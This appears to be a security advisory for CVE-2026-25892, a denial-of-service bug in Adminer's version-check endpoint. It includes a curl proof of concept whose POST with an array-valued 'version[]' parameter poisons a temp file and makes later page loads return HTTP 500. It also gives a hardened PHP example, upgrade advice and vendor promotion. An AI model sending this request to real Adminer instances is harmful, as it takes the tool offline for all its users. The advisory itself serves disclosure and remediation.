CVE-2026-25892

CVE-2026-25892 is a high-severity improper input validation vulnerability in vrana/adminer (composer), affecting versions >= 4.6.2, < 5.4.2. It is fixed in 5.4.2.

Summary

Adminer v5.4.1 has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST a version[] parameter, which PHP converts to an array. On the next page load, openssl_verify() receives this array instead of a string and throws a TypeError, returning HTTP 500 to all users.

Details

1. Intended design of ?script=version:

The endpoint is designed to receive version data from adminer.org via browser JavaScript:

  • functions.js lines 102-117: Creates an iframe to https://www.adminer.org/version/
  • Adminer.org sends signed version data via postMessage
  • JavaScript POSTs this to ?script=version
  • Server stores it in /tmp/adminer.version for later signature verification

// functions.js line 117
ajax(url + 'script=version', () => { }, event.data + '&token=' + token);

2. The vulnerability:

The endpoint only checks that $_GET["script"] == "version"; it does not validate:

  • Request origin (no CSRF token check for this endpoint)
  • Request source (any HTTP client can POST)
  • Parameter types (version expected as string, array not rejected)

// bootstrap.inc.php lines 32-40
if ($_GET["script"] == "version") {
    $filename = get_temp_dir() . "/adminer.version";
    @unlink($filename);
    $fp = file_open_lock($filename);
    if ($fp) {
        file_write_unlock($fp, serialize(array("signature" => $_POST["signature"], "version" => $_POST["version"])));
    }
    exit;
}

3. Type confusion crash:

When the POST body contains version[] instead of version, PHP creates an array. When Adminer later reads this file and passes the stored value to openssl_verify():

// design.inc.php line 75
if (openssl_verify($version["version"], base64_decode($version["signature"]), $public) == 1) {

PHP 8.x throws:

TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given
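The following is an added illustration, not Adminer's own code or its 5.4.2 fix, of how the two halves of this exchange can be hardened: the ?script=version handler rejects anything that is not a well-formed string pair, checks the token the JavaScript already appends, and verifies the adminer.org signature before anything is persisted; the reader then tolerates a missing or poisoned cache file instead of letting a TypeError reach every user. The function names, the $publicKeyPem and $expectedToken parameters, and the choice of JSON rather than serialize() for the cache file are assumptions made for this example.

```php
<?php
// Added example (not Adminer's code): hardened ?script=version store and read.
// Assumptions: $publicKeyPem is adminer.org's PEM public key, $expectedToken is
// the per-session token the page's JavaScript appends, $dir is the temp directory.

declare(strict_types=1);

const VERSION_FILE_NAME = 'adminer.version';

/** Every field must be a string: version[]=... arrives as an array and is refused here. */
function version_post_is_valid(array $post): bool
{
    if (!isset($post['signature'], $post['version'], $post['token'])) {
        return false;
    }
    if (!is_string($post['version']) || !is_string($post['signature']) || !is_string($post['token'])) {
        return false;
    }
    // A version number is a short dotted numeric; anything else never reaches the cache file.
    if (!preg_match('/^\d+(\.\d+){0,3}$/', $post['version'])) {
        return false;
    }
    // Strict base64 decoding rejects malformed signatures before openssl_verify() sees them.
    return base64_decode($post['signature'], true) !== false;
}

/** Constant-time token comparison; is_string() was checked above so hash_equals() cannot throw. */
function version_token_is_valid(array $post, string $expectedToken): bool
{
    return is_string($post['token'] ?? null) && hash_equals($expectedToken, $post['token']);
}

/** openssl_verify() returns 1 for a valid signature, 0 for invalid, -1/false on error. */
function verify_version_signature(string $version, string $signatureB64, string $publicKeyPem): bool
{
    $sig = base64_decode($signatureB64, true);
    if ($sig === false) {
        return false;
    }
    return openssl_verify($version, $sig, $publicKeyPem) === 1;
}

/** Persist the version only after type, token and signature checks all pass. */
function store_version(array $post, string $expectedToken, string $publicKeyPem, string $dir): bool
{
    if (!version_post_is_valid($post) || !version_token_is_valid($post, $expectedToken)) {
        return false;
    }
    if (!verify_version_signature($post['version'], $post['signature'], $publicKeyPem)) {
        return false;
    }
    // JSON instead of serialize(): the reader never unserializes attacker-influenced bytes.
    $payload = json_encode(['signature' => $post['signature'], 'version' => $post['version']]);
    if ($payload === false) {
        return false;
    }
    return file_put_contents($dir . '/' . VERSION_FILE_NAME, $payload, LOCK_EX) !== false;
}

/** Read the cached version back; a missing, corrupt or type-confused file yields null, not a 500. */
function read_version(string $dir): ?string
{
    $path = $dir . '/' . VERSION_FILE_NAME;
    $raw = @file_get_contents($path);
    if ($raw === false) {
        return null;
    }
    $data = json_decode($raw, true);
    if (!is_array($data) || !isset($data['version']) || !is_string($data['version'])) {
        // Discard a poisoned cache file once rather than failing on every page load.
        @unlink($path);
        return null;
    }
    return $data['version'];
}
```

With these checks the request body shown in the PoC (a one-character signature and an array-valued version) is refused at the is_string() test in version_post_is_valid() and nothing is written, so there is no file for the later openssl_verify() call to choke on. Verifying the signature at store time is the more important change: the cache can then only ever contain data adminer.org actually signed, and read_version() is a safety net rather than the first line of defence.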

PoC

Steps to Reproduce:

Step 1: Verify Adminer is running and accessible.

curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.php

Expected output:

200

Step 2: Send the malicious POST request. The version[] syntax causes PHP to create an array instead of a string.

curl -X POST "http://localhost:8888/adminer-5.4.1.php?script=version" \
     -d "signature=x&version[]=INJECTED"

Expected output: Empty response (no error).

Step 3: Access Adminer again to trigger the crash.

curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.php

Expected output:

500

Step 4: (Optional) View the PHP error in server logs.

PHP Fatal error:  Uncaught TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given in adminer-5.4.1.php:1386

Step 5: (Optional) Inspect the poisoned file.

cat /tmp/adminer.version

Expected output:

a:2:{s:9:"signature";s:1:"x";s:7:"version";a:1:{i:0;s:8:"INJECTED";}}

Recovery:

rm /tmp/adminer.version

After deletion, Adminer returns HTTP 200.

Impact

Type: Denial of Service

Root cause: The ?script=version endpoint is designed to receive data from adminer.org via JavaScript, but lacks server-side validation. Any HTTP client can POST directly to this endpoint. Combined with missing type validation before openssl_verify(), this allows persistent DoS.

Affected users: Any Adminer instance accessible over the network.

The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact varies by context (data corruption, logic bypass, or denial of service); here it is denial of service.

CVE-2026-25892 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.4.2); upgrading removes the vulnerable code path.

Affected versions

vrana/adminer (>= 4.6.2, < 5.4.2)

Security releases

vrana/adminer → 5.4.2 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade to Adminer 5.4.2.

Mitigation (if you can't upgrade): Make the file adminer.version in the temp directory (usually the value of upload_tmp_dir) unwritable by the web server.

Frequently Asked Questions

  1. What is CVE-2026-25892? CVE-2026-25892 is a high-severity improper input validation vulnerability in vrana/adminer (composer), affecting versions >= 4.6.2, < 5.4.2. It is fixed in 5.4.2. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
  2. How severe is CVE-2026-25892? CVE-2026-25892 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of vrana/adminer are affected by CVE-2026-25892? vrana/adminer (composer) versions >= 4.6.2, < 5.4.2 are affected.
  4. Is there a fix for CVE-2026-25892? Yes. CVE-2026-25892 is fixed in 5.4.2. Upgrade to this version or later.
  5. Is CVE-2026-25892 exploitable, and should I be worried? Whether CVE-2026-25892 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-25892 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-25892? Upgrade vrana/adminer to 5.4.2 or later.

Other vulnerabilities in vrana/adminer

  • CVE-2025-43960
  • CVE-2021-43008
  • CVE-2021-29625
  • CVE-2018-7667
  • CVE-2021-21311
